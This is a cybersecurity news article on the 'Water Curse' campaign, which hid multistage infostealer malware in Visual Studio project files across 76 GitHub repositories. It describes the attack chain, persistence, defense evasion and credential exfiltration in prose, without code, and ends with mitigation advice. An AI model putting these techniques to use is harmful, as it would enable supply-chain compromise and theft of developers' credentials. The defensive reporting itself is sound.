Water Curse Hacker Group Unleashes Multistage Malware via 76 Weaponized GitHub Accounts

A highly active cybercriminal group known as “Water Curse” has been found distributing multistage malware through at least 76 weaponized GitHub repositories, posing a severe threat to cybersecurity professionals, game developers, and software engineering teams.

This campaign is notable for its blend of stealth, technical sophistication, and exploitation of legitimate open-source platforms, presenting a significant supply chain risk to organizations globally.

Security researchers from Trend Micro’s Managed Detection and Response (MDR) team analyzed the attack chain, discovered that malicious payloads were concealed within widely used tools, including an SMTP email bomber and the Sakura-RAT.

The group embedded their malware into Visual Studio project configuration files, leveraging the inherent trust developers place in open-source software.

Upon execution, the infected project files triggered a complex infection process: malicious batch scripts in the <PreBuildEvent> tag generated a VBS script, which in turn downloaded and executed obfuscated PowerShell scripts.

These scripts utilized custom key derivation to decrypt additional payloads.

They performed extensive system reconnaissance, including anti-debugging checks, privilege escalation via Windows Registry modifications (notably a UAC bypass), and the creation of persistent scheduled tasks to secure long-term control over infected hosts.

Multistage Infection and Data Exfiltration Mechanisms

The malware’s modular payloads are designed for adaptability and evasion. Once executed, Water Curse’s malware leverages legitimate tools, such as 7-Zip, to unpack encrypted archives, dropping Electron-based applications and additional scripts.

Notable behaviors include disabling Windows Defender (via scripts such as disabledefender.ps1), deleting Volume Shadow Copies to prevent system recovery, and establishing persistence through scheduled tasks running with system privileges.

The scheduled tasks, masquerading as legitimate diagnostic processes (e.g., “BitLocker Encrypt All Drives”), are configured to remain active almost indefinitely, launching Electron-based launchers with embedded malicious code.

Water Curse’s primary goal is information theft. The malware collects sensitive user data from browser profiles, including saved passwords, cookies, autofill data, browsing histories, and session tokens, from browsers such as Chrome, Edge, and Firefox.

It also exfiltrates session artifacts from platforms such as GitHub and ChatGPT, and prepares RDP configuration files for remote access or lateral movement.

Orchestration and exfiltration are facilitated via outbound connections to Telegram and Gofile servers, leveraging legitimate cloud services to blend in with regular network traffic.

The data is compressed using 7-Zip into an archive named “stealFiles.7z” before being uploaded.

Defense and Mitigation: Lessons for Organizations

The Water Curse campaign exemplifies the growing risks of supply chain compromise and highlights the importance of rigorous code validation, especially for open-source tools.

Organizations are urged to audit all open-source dependencies, scrutinize build scripts and repository histories, and consider utilizing internal code repositories where feasible.

Advanced threat detection platforms, such as Trend Vision One, have proven effective in identifying and blocking these attacks by correlating telemetry and leveraging AI-driven analytics.

As attacks from groups like Water Curse become more sophisticated and targeted, proactive security awareness and threat intelligence sharing within the cybersecurity and developer communities remain critical for maintaining robust digital defenses.

By understanding and mitigating the technical and social engineering tactics employed in this campaign, organizations can significantly reduce their exposure to similar supply chain threats in the future.